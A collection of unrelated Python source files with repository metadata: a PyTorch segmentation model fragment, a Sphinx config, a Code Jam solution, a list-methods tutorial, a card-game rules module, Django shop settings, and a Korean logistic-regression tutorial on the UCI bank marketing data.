self.conv7 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv8 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv9 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.newft3_bn = nn.BatchNorm2d(64)
self.newft2_bn = nn.BatchNorm2d(64)
self.newft1_bn = nn.BatchNorm2d(64)
def forward(self,input):
ft1 = self.conv1_bn(F.leaky_relu(self.down1(F.leaky_relu(self.conv4(F.leaky_relu(self.conv1(input))))))) #1*32*160*160
ft2 = self.conv2_bn(F.leaky_relu(self.down2(F.leaky_relu(self.conv5(F.leaky_relu(self.conv2(ft1))))))) #1*64*80*80
ft3 = self.conv3_bn(F.leaky_relu(self.down3(F.leaky_relu(self.conv6(F.leaky_relu(self.conv3(ft2))))))) #1*128*40*40
new_ft3 = self.newft3_bn(F.leaky_relu(self.conv7(self.lateral3(ft3)))) #1*64*40*40 ; name as lateral3
new_ft2 = self.newft2_bn(F.leaky_relu(self.conv8(self.lateral2(ft2)+self.upsample3(new_ft3)))) #1*64*80*80
new_ft1 = self.newft1_bn(F.leaky_relu(self.conv9(self.lateral1(ft1)+self.upsample2(new_ft2)))) #1*64*160*160
return new_ft1,new_ft2,new_ft3
class SA(nn.Module):
def __init__(self):
super(SA, self).__init__()
self.downsample = nn.Conv2d(in_channels=192,out_channels=128,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv1 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv2 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv3 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv4 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.upsample3 = nn.Upsample(scale_factor=4,mode='bilinear',align_corners=True)
self.upsample2 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
self.downsample_bn = nn.BatchNorm2d(128)
self.bn_conv1 = nn.BatchNorm2d(128)
self.bn_conv2 = nn.BatchNorm2d(128)
self.bn_conv3 = nn.BatchNorm2d(128)
self.bn_conv4 = nn.BatchNorm2d(128)
def forward(self,new_ft1,new_ft2,new_ft3):
sa1 = new_ft1
sa2 = self.upsample2(new_ft2)
sa3 = self.upsample3(new_ft3)
concat = torch.cat((sa1,sa2,sa3),dim=1) #1*96*80*80 #Difference between torch.stack and torch.cat
downsample = self.downsample_bn(F.leaky_relu(self.downsample(concat))) #1*128*80*80
conv = self.bn_conv1(F.leaky_relu(self.conv1(downsample))) #1*128*80*80
conv = self.bn_conv2(F.leaky_relu(self.conv2(conv))) #1*128*80*80
downsample = conv+downsample #residual connection; 1*128*80*80
conv = self.bn_conv3(F.leaky_relu(self.conv3(downsample))) #1*128*80*80
conv = self.bn_conv4(F.leaky_relu(self.conv4(conv))) #1*128*80*80
out = conv+downsample #residual connection; 1*128*80*80
return out
class full_model(nn.Module):
def __init__(self):
super(full_model,self).__init__()
self.fpn = FPN()
self.sa = SA()
self.final_conv = nn.Conv2d(in_channels=128,out_channels=7,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.softmax = nn.LogSoftmax()
def forward(self, input, num_classes=7):
ft1,ft2,ft3 = self.fpn.forward(input)
sa_maps = self.sa.forward(ft1,ft2,ft3)
out = F.upsample(self.final_conv(sa_maps), input.size()[2:], mode='bilinear', align_corners=True)
return self.softmax(out) | [
"[email protected]"
] | |
37bdf2dde85f8ce44a0ed9c15e3028b0dce45219 | 221fa1f7a86c7b84941671e36993e1fee8be63a8 | /docs/source/conf.py | 726022cda46dc4d17624ecd88e848be02a343f3b | [
"MIT"
] | permissive | lkilcommons/geospacepy-lite | a2b8510f74f9c07d560fb98e955e1c69b07e7c8d | cbe2e23e5906aa922c661a81e75d26e4f7b29bd4 | refs/heads/master | 2022-05-16T09:51:59.044106 | 2022-03-29T16:53:52 | 2022-03-29T16:53:52 | 95,029,209 | 4 | 7 | MIT | 2022-03-29T16:53:54 | 2017-06-21T17:29:23 | Python | UTF-8 | Python | false | false | 5,142 | py | # -*- coding: utf-8 -*-
#
# geospacepy-lite documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 13 12:00:49 2019.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'geospacepy-lite'
copyright = u'2021, Liam Kilcommons'
author = u'Liam Kilcommons'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.2'
# The full version, including alpha/beta/rc tags.
release = u'0.2.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'classic'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'geospacepy-litedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'geospacepy-lite.tex', u'geospacepy-lite Documentation',
u'Liam Kilcommons', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'geospacepy-lite', u'geospacepy-lite Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'geospacepy-lite', u'geospacepy-lite Documentation',
author, 'geospacepy-lite', 'One line description of project.',
'Miscellaneous'),
]
# Napoleon settings
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
| [
"[email protected]"
] | |
6a3d2165725d9dbb9b0c88f30a3e8a0b10980d4f | 98e60f24bbd5613b01b2f6ab9d316111d525b5c2 | /Puzzles/CountingSheep/sleep.py | 9d65166133538de5025298f0521c6a4b85fe0833 | [] | no_license | tgomudur/CodingChallenges | eb49c9c25d16f4ebead4294fd88895c8c6f56feb | d5b7728de9066ab531295891b46c3983580b6b34 | refs/heads/master | 2020-12-24T20:51:42.040520 | 2016-05-23T23:47:31 | 2016-05-23T23:47:31 | 58,672,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | with open("A-large.in") as infile:
lines = [int(item) for item in infile.readlines()]
ntests = lines[0]
numbers = lines[1:]
# ntests = input()
outfile = open("Output.txt", 'w')
for case in range(ntests):
# n = input()
n = numbers[case]
seen = [0]*10
seen_sum = 0
i = 1
if n == 0:
outfile.write("Case #{}: INSOMNIA\n".format(case+1))
continue
else:
num = n
while seen_sum != 10:
n = num*i
orginal_num = n
while n:
digit = n % 10
if seen[digit] == 0:
seen[digit] = 1
seen_sum += 1
if seen_sum == 10:
outfile.write("Case #{}: {}\n".format(case + 1, orginal_num))
break
n = n / 10
i = i + 1
| [
"[email protected]"
] | |
da8ef3e826bf2022ad5601eb34a52dc472d1450a | 540f6a80b49f91c1d67d9c2eabedffc5b450c0d0 | /shifali/test45.py | 90f5bba80a4572097278994a996d394971f554ea | [] | no_license | shifalik/practice | 3a56c89bbf74c18d93eadbacae45e6c8d09795d5 | 3b2e862675f89a54a795be8058be3adc019ba24b | refs/heads/master | 2021-01-24T01:39:58.874359 | 2018-02-25T08:23:26 | 2018-02-25T08:31:34 | 122,817,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,481 | py | '''
Created on Feb 8, 2018
@author: shifa
'''
# Lists
# They are sequences
# NOTE: items in list don't have to be same data type
#--------------------------------------------------------
list1 = ['physics', 'chemistry', 1997, 2000]
list2 = [1, 2, 3, 4, 5]
list3 = ["a", "b", "c", "d"]
print("List1:", list1, "\nList2:", list2, "\nList3:", list3)
print()
#--------------------------------------------------------
print("Accessing values in list.")
print("list1[0]: ", list1[0])
print("list2[1:5]: ", list2[1:5])
print()
#--------------------------------------------------------
print("Updating Lists")
print("Value available at index 2: ", list1[2])
list1[2] = 2001
print("New value available at index 2: ", list1[2])
print()
#--------------------------------------------------------
print("Delete List Elements")
print(list1)
del list1[2]
print("After deleting value at index 2:\n", list1)
print()
#--------------------------------------------------------
print("Basic List Operations")
a = [1, 2, 3]
b = [4, 5, 6]
c = ['Hi!']
print("List a:", a, "\nList b:", b, "\nList c:", c)
print()
print("Length of a:", len(a))
print("Concatenation of a and b:", a + b)
print("Repetition of c:", c * 4)
print("Membership of 3 in a:", 3 in a)
# for loop to print all values of a
print("Printing values of a using for loop:")
for x in a:
print(x, end=' ')
# end=' ' gives it space while printing instead of
# printing on a new line
print()
print()
#--------------------------------------------------------
print("Indexing, Slicing, and Matrixes")
L = ['C++', 'Java', 'Python' , 'C#', 'Ruby']
print("List L:", L)
print()
print("Offsets start at 0:")
print("L[2]:", L[2])
print("Negative: count from the right:")
print("L[-2]:", L[-2])
#counts from backwards for L[-2]
print("Slicing fetches sections:")
print("L[1:]:", L[1:])
print()
#--------------------------------------------------------
print("BULIT IN FUNCTIONS AND METHODS")
#--------------------------------------------------------
print()
print("len(list)")
list1 = ['physics', 'chemistry', 'math']
print("list1: ", list1)
print("Length of list1: ", len(list1))
list2 = list(range(5)) # creates list of numbers between 0-4
print("list2: ", list2)
print("length of list2: ", len(list2))
print()
#--------------------------------------------------------
print("max(list)")
# max valued element is to be returned
list1, list2 = ['C++', 'Java', 'Za', 'Zb' ,'Python', 'Alphabetical'], [456, 700, 200]
#max prints higher valued letter in beginning
print("list1:", list1, "\nlist2", list2)
print("Max value element from list1:", max(list1))
print("Max value element from list2:", max(list2))
#--------------------------------------------------------
print("min(list)")
# using above lists
print("Min value element from list1:", min(list1))
print("Min value element from list2:", min(list2))
print()
#--------------------------------------------------------
print("list(seq)")
# takes sequence types and converts them to lists
# used to convert tuple or string into list
# tuple uses (), lists use []
aTuple = (123, 'C++', 'Java', 'Python')
list1 = list(aTuple)
print("List elements from tuple:", list1)
str1 = "Hello World"
list2 = list(str1)
print("list elements from string:", list2)
print()
#--------------------------------------------------------
print("METHODS")
#--------------------------------------------------------
print()
print("list.append(obj)")
# does not return value but updates list
list1 = ['C++', 'Java', 'Python']
print("list1:", list1)
list1.append('C#')
print("updated list:", list1)
print()
#--------------------------------------------------------
print("list.count(obj)")
# returns count of how many times obj occurs in list
aList = [123, 'xyz', 'zara', 'abc', 123]
print("aList:", aList)
print("Count for 123:", aList.count(123))
print("Count for zara:", aList.count('zara'))
# tested: if there are no values then it will return 0
print()
#--------------------------------------------------------
print("list.extend(seq)")
# appends the contents of seq to list
# does not return any value but adds the content
# to existing list
list1 = ['physics', 'chemistry', 'math']
list2 = list(range(5))
print("list1:", list1)
print("list2:", list2)
list1.extend(list2)
print("Extended List:", list1)
#different from concatenation because in concatenation you
#need to store a + b into c
#here we don't need to because list1 is extended
print()
#--------------------------------------------------------
print("list.index(obj)")
# returns lowest index in list that obj appears
# raises exception if object not found
list1 = ['physics', 'chemistry', 'math']
print("list1:", list1)
print("Index of chemistry:", list1.index("chemistry"))
# print("Index of C#", list1.index("C#"))
# throws exception like it should
print()
#--------------------------------------------------------
print("list.insert(index, obj)")
# inserts object into list at offset index
# index is where object obj is needed to be inserted
# obj is what is going in the list
list1 = ['physics', 'chemistry', 'math']
print("list1:", list1)
list1.insert(1, 'biology')
print("Final List: ", list1)
# all else gets pushed down the list
print()
#--------------------------------------------------------
print('list.pop(obj = list[-1]')
# removes and returns last object from the list
# obj is optional parameter, can give index of object
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.pop() # takes off last element
print("list1 now:", list1)
list1.pop(1) # takes off list1[1] element
print("list1 now:", list1)
print()
#--------------------------------------------------------
print('list.remove(obj)')
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.remove('biology')
print("list1 now:", list1)
list1.remove("math")
print("list1 now:", list1)
print()
#--------------------------------------------------------
print("list.reverse()")
# reverses objects of list in place
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.reverse()
print("reversed list1:", list1)
print()
#--------------------------------------------------------
print("list.sort([func])")
# sorts objects of list
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.sort()
print("sorted list1:", list1)
print()
#--------------------------------------------------------
| [
"[email protected]"
] | |
4cb3132b3aba020e6a7b65472a7ad7b7c5d907e7 | 670881ff3ef0bf07e3e4d93e8da5917ace9238e8 | /src/core/rule.py | 47497f7aa1ad3fb62f87a123cf83f910af37cec1 | [] | no_license | anninz/xiyouji | 74e6777af27f86d0d1dd688702785348ba2efc24 | 6f2f3436803ffb0a13b95b1f27ff593567be9341 | refs/heads/master | 2020-03-17T03:00:44.602635 | 2018-05-19T10:13:08 | 2018-05-19T10:13:08 | 133,215,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,144 | py | from collections import Counter
import logging
import json
logger = logging.getLogger('ddz')
'''
# A 2 3 4 5 6 7 8 9 0 J Q K W w
# 记分
# 地主先出完所有的牌就赢了,如果没有出过炸弹或火箭,那么每个农民要把定约的分数(1分、2分或3分)付给地主。
# 两个农民中有一个先出完所有的牌,地主就输了,那么地主要把定约的分数付给每个农民。
# 每当任何一个玩家出了炸弹或火箭,那么分数就要翻一番。
# 例如某局牌出了2个炸弹和1个火箭,叫3分的地主如果先出完,他就向每个农民赢得24分【总共赢得48分】,
# 如果农民先出完,地主就向每个农民输掉24分【总共输掉48分】。
'''
CARD_TYPES = [
'single', 'pair', 'trio', 'four', 'five',
'six', 'seven', 'eight'
]
with open('static/rule.json', 'r') as f:
rules = json.load(f)
def get_poker_attr(value):
type = 0
if value == 10:
type = 6
if value == 9:
type = 5
if value == 8:
type = 4
if value == 7:
type = 3
if value == 4 or value == 5 or value == 6:
type = 2
if value == 0 or value == 1 or value == 2 or value == 3:
type = 1
return type
def compare_poker_1(cardA, cardB):
typeA = get_poker_attr(cardA)
typeB = get_poker_attr(cardB)
if typeA == typeB:
return (cardA - cardB) > 0
elif typeB == 3 and typeA != 2:
return 1
elif typeB == 1:
if typeA != 3 and typeA != 1:
return 1
elif typeA > typeB:
return 1
return 0
def is_contains(parent, child):
parent, child = Counter(parent), Counter(child)
for k, n in child.items():
if k not in parent or n > parent[k]:
return False
return True
def cards_above(hand_pokers, turn_pokers):
hand_cards = _to_cards(hand_pokers)
turn_cards = _to_cards(turn_pokers)
card_type, card_value, card_type1 = _cards_value(turn_cards)
if not card_type:
return []
one_rule = rules[card_type]
for i, t in enumerate(one_rule):
if compare_poker_1(i, card_value) and is_contains(hand_cards, t):
return _to_pokers(hand_pokers, t)
return []
def _to_cards(pokers):
cards = []
for p in pokers:
if p == 53:
cards.append('W')
elif p == 52:
cards.append('w')
else:
cards.append('A234567890JQK'[p % 13])
return _sort_card(cards)
def _to_poker(card):
if card == 'W':
return [53]
if card == 'w':
return [52]
cards = 'A234567890JQK'
for i, c in enumerate(cards):
if c == card:
return [i, i + 13, i + 13*2, i + 13*3]
return [54]
def _to_pokers(hand_pokers, cards):
pokers = []
for card in cards:
candidates = _to_poker(card)
for cd in candidates:
if cd in hand_pokers and cd not in pokers:
pokers.append(cd)
break
return pokers
def _cards_value(cards):
cards = ''.join(cards)
return _card_type(cards)
def compare_poker(a_pokers, b_pokers):
if not a_pokers or not b_pokers:
if a_pokers == b_pokers:
return 0
if a_pokers:
return 1
if b_pokers:
return 1
a_card_type, a_card_value, a_card_type1 = _cards_value(_to_cards(a_pokers))
b_card_type, b_card_value, b_card_type1 = _cards_value(_to_cards(b_pokers))
if a_card_type == b_card_type:
return compare_poker_1(a_card_value, b_card_value)
return 0
def _sort_card(cards):
cards.sort(key=lambda ch: '34567890JQKA2wW'.index(ch))
return cards
def _index_of(array, ele):
if len(array[0]) != len(ele):
return -1
for i, e in enumerate(array):
if e == ele:
return i
return -1
def _card_type(cards):
for t in CARD_TYPES:
value = _index_of(rules[t], cards)
if value >= 0:
return t, value, get_poker_attr(value)
logger.info('Unknown Card Type: %s', cards)
# raise Exception('Unknown Card Type: %s' % cards)
return '', 0, -1
| [
"[email protected]"
] | |
09776316fb421e0bbceaef668d1fa5dd48acefec | e094acbfb223a19521a742befc5b7d45987749ff | /myshop/settings.py | 384f29086ed62c1f039fd3ad462f80db15e5ee88 | [] | no_license | bolajixi/django-commerce-shop | 41f8e75e8e33132c59c2e3a5e6e08f74217c1f65 | 86a3d4e988135d9982b352134d29904adc643d9d | refs/heads/main | 2023-07-23T03:11:18.039631 | 2021-08-23T06:55:12 | 2021-08-23T06:55:12 | 395,966,639 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,622 | py | """
Django settings for myshop project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv("PROJECT_SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'shop.apps.ShopConfig',
'cart.apps.CartConfig',
'orders.apps.OrdersConfig',
'payment.apps.PaymentConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'cart.context_processors.cart',
],
},
},
]
WSGI_APPLICATION = 'myshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
BASE_DIR / STATIC_URL,
]
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media/'
CART_SESSION_ID = 'cart'
# Configure email to send to console
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
PAYSTACK_SECRET_KEY = os.getenv("PAYSTACK_AUTHORIZATION_KEY")
PAYSTACK_TEST_PUB_KEY = os.getenv("PAYSTACK_TEST_PUB_KEY")
| [
"[email protected]"
] | |
177bb4da1f8539439aa74c5b45afc7144f03ae11 | 167fdbfb5a68d49eb6de65200563b8db03d956b2 | /reference/understanding-ml-code/ch13-분류 문제와 로지스틱 회귀 분석/logistic_intro.py | 350bde497a83f448462caa1fcfc9448fd7a92379 | [] | no_license | Naamu/ml-learning | 11ad20f2e1f06701e362e2c6ca86d8070163a95f | 5276026f01c31708d494d7c4d8b1cdc3cc66f57d | refs/heads/master | 2022-09-04T17:32:29.540737 | 2022-07-20T00:28:48 | 2022-07-20T00:28:48 | 187,772,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,477 | py | #
# 프로그램 이름: logistic_intro.py
# 작성자: Bong Ju Kang
# 설명: 로지스틱 회귀 분석을 통한 분류 문제 이해하기
#
# 필요한 패키지
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import requests, zipfile, io
from sklearn.linear_model import LinearRegression, LogisticRegressionCV
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
from sklearn.model_selection import train_test_split
# 초기 설정
png_path = "./data/png"
os.makedirs(png_path, exist_ok=True)
# 한글출력
plt.rcParams['font.family'] = 'Malgun Gothic'
plt.rcParams['axes.unicode_minus'] = False
# 데이터 가져오기
path = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00222/'
zip_url = path + 'bank.zip'
z = zipfile.ZipFile(io.BytesIO(requests.get(zip_url).content)) # 짚 파일 풀기
z.infolist() # 짚 파일 내의 구성 요소 보기
df = pd.read_csv(z.open('bank.csv'),sep=';') # 특정 요소 가져오기
df.columns
# 데이터 속성
# Input variables:
# # bank client data:
# 1 - age (numeric)
# 2 - job : type of job (categorical: "admin.","unknown","unemployed","management","housemaid","entrepreneur","student",
# "blue-collar","self-employed","retired","technician","services")
# 3 - marital : marital status (categorical: "married","divorced","single"; note: "divorced" means divorced or widowed)
# 4 - education (categorical: "unknown","secondary","primary","tertiary")
# 5 - default: has credit in default? (binary: "yes","no")
# 6 - balance: average yearly balance, in euros (numeric)
# 7 - housing: has housing loan? (binary: "yes","no")
# 8 - loan: has personal loan? (binary: "yes","no")
# # related with the last contact of the current campaign:
# 9 - contact: contact communication type (categorical: "unknown","telephone","cellular")
# 10 - day: last contact day of the month (numeric)
# 11 - month: last contact month of year (categorical: "jan", "feb", "mar", ..., "nov", "dec")
# 12 - duration: last contact duration, in seconds (numeric)
# # other attributes:
# 13 - campaign: number of contacts performed during this campaign and for this client (numeric, includes last contact)
# 14 - pdays: number of days that passed by after the client was last contacted from a previous campaign (numeric, -1 means client was not previously contacted)
# 15 - previous: number of contacts performed before this campaign and for this client (numeric)
# 16 - poutcome: outcome of the previous marketing campaign (categorical: "unknown","other","failure","success")
#
# Output variable (desired target):
# 17 - y - has the client subscribed a term deposit? (binary: "yes","no")
df.info()
df.y.value_counts() # 목표 변수 분포 확인
# no 4000
# yes 521
# Name: y, dtype: int64
# 문자 변수를 숫자 변수로 치환하기
df['num_y'] = pd.get_dummies(df['y'], drop_first=True)
# 변수 정의
x = df['duration']
y = df['num_y']
#
# 선형 회귀 모형 적합
#
# 접촉 시간(duration) vs 정기예금 가입여부(num_y) 산점도
plt.figure(figsize=(6,4))
plt.scatter(x,y, s=1, label="산점도")
plt.xlabel("접촉시간")
plt.ylabel('정기예금가입여부')
plt.title('접촉시간 vs. 정기예금가입여부 산점도 및 선형회귀 직선')
# 선형 회귀 모형
regmodel = LinearRegression(fit_intercept=True)
regmodel.fit(x.values.reshape((-1,1)), y.values.reshape((-1,1)))
h = regmodel.predict(x.values.reshape((-1,1)))
plt.plot(x,h, color='orange', label="선형회귀")
plt.ylim((-0.1,1.1))
plt.legend()
plt.savefig(png_path + '/logistic_linearfit.png')
plt.show()
#
# 로지스틱 함수의 적합
#
# 로지스틱 함수의 모양 살펴보기
z = np.linspace(-5,5,100)
p_z = 1/(1+np.exp(-z))
plt.figure(figsize=(6,4))
plt.plot(z,p_z, color='black', label='logistic function')
plt.xlabel('z')
plt.ylabel('p(z)')
plt.legend()
plt.savefig(png_path + '/logistic_logisticCurve.png')
plt.show()
# 로지스틱 함수 적합
logisticModel = LogisticRegression(random_state=123)
logisticModel.fit(x,y)
# 적합 결과
logisticModel.coef_
logisticModel.intercept_
# 예측
logisticModel.predict_proba(x).shape
df['num_y'].value_counts()
predicted = logisticModel.predict(x)
prob = logisticModel.predict_proba(x)[:,1] # 'y' 확률
np.unique(predicted, return_counts=True)
score = logisticModel.score(x,y) # 정분류율
# 0.8882990488829905
# confusion matrix (분류 결과표)
metrics.confusion_matrix(y, predicted)
# array([[3913, 87],
# [ 350, 171]], dtype=int64)
# 적합된 결과 그래프
plt.figure(figsize=(6,4))
plt.scatter(x,y, s=1)
plt.xlabel("접촉시간")
plt.ylabel('정기예금가입여부')
plt.title('접촉시간 vs. 정기예금가입여부 산점도 및 로지스틱회귀 곡선')
plt.scatter(x,prob, color='orange', label="로지스틱 회귀", s=1)
plt.axhline(y=0.5, color='red', label='결정선')
plt.ylim((-0.1,1.1))
plt.legend(loc=(0.05, 0.75))
plt.savefig(png_path + '/logistic_scatterWithlogisticCurve.png')
plt.show()
#
# 비용 함수의 의미
#
h = np.linspace(0.00001,1, 1000)
loss = -np.log(h)
plt.figure(figsize=(6,4))
plt.scatter(h, loss, s=1)
plt.xlabel("h")
plt.ylabel('cost=-log(h)')
plt.title('h vs. cost Scatter Plot with y=1')
plt.tight_layout()
plt.savefig(png_path + '/logistic_costFunction.png')
plt.show()
#
# ROC 그래프 알고리즘에 대한 이해
#
# 데이터 구성
# 예측 확률
y_score = np.array([0.3, 0.4, 0.55, 0.75, 0.97])
# 실제 목표 값
y_true = np.array([0, 1, 0, 1, 1 ])
# 예측 확률에 대한 내림 차순 정렬한 인덱스 값
ix = np.argsort(y_score)[::-1]
# 내림 차순 정렬된 목표 값의 순차적으로 누적
fps = np.cumsum(y_true[ix] == 0)
tps = np.cumsum(y_true[ix] == 1)
# (0, 0) 부터 시작하기 위하여 0 값 추가
tps = np.r_[0, tps]
fps = np.r_[0, fps]
# 전체 이벤트 개수와 비 이벤트 개수로 나눔
fpr = fps / fps[-1]
tpr = tps / tps[-1]
# fpr, tpr를 이용한 그래프
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr)
plt.plot([-0.02, 1.02], [-0.02, 1.02], color='gray', linestyle=':') # 무작위 모델
plt.margins(0) # 실제 데이터 그림과 축간의 간격
plt.xlabel('fpr: 1-Specificity')
plt.ylabel('tpr: Sensitivity')
plt.title("ROC Curve", weight='bold')
plt.savefig(png_path + '/logistic_ROC_scratch.png')
plt.show()
#
# 예제: [BANK] 데이터의 로지스틱 회귀 적합
#
# 데이터 가져오기
path = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00222/'
zip_url = path + 'bank.zip'
z = zipfile.ZipFile(io.BytesIO(requests.get(zip_url).content)) # 짚 파일 풀기
z.infolist() # 짚 파일 내의 구성 요소 보기
df = pd.read_csv(z.open('bank.csv'),sep=';') # 특정 요소 가져오기
df.columns
# 가변수 구성을 위한 get_dummies 이해하기
pd.get_dummies([0,1,0,1,2])
# 0 1 2
# 0 1 0 0
# 1 0 1 0
# 2 1 0 0
# 3 0 1 0
# 4 0 0 1
pd.get_dummies([0,1,0,1,2], drop_first=True)
# 1 2
# 0 0 0
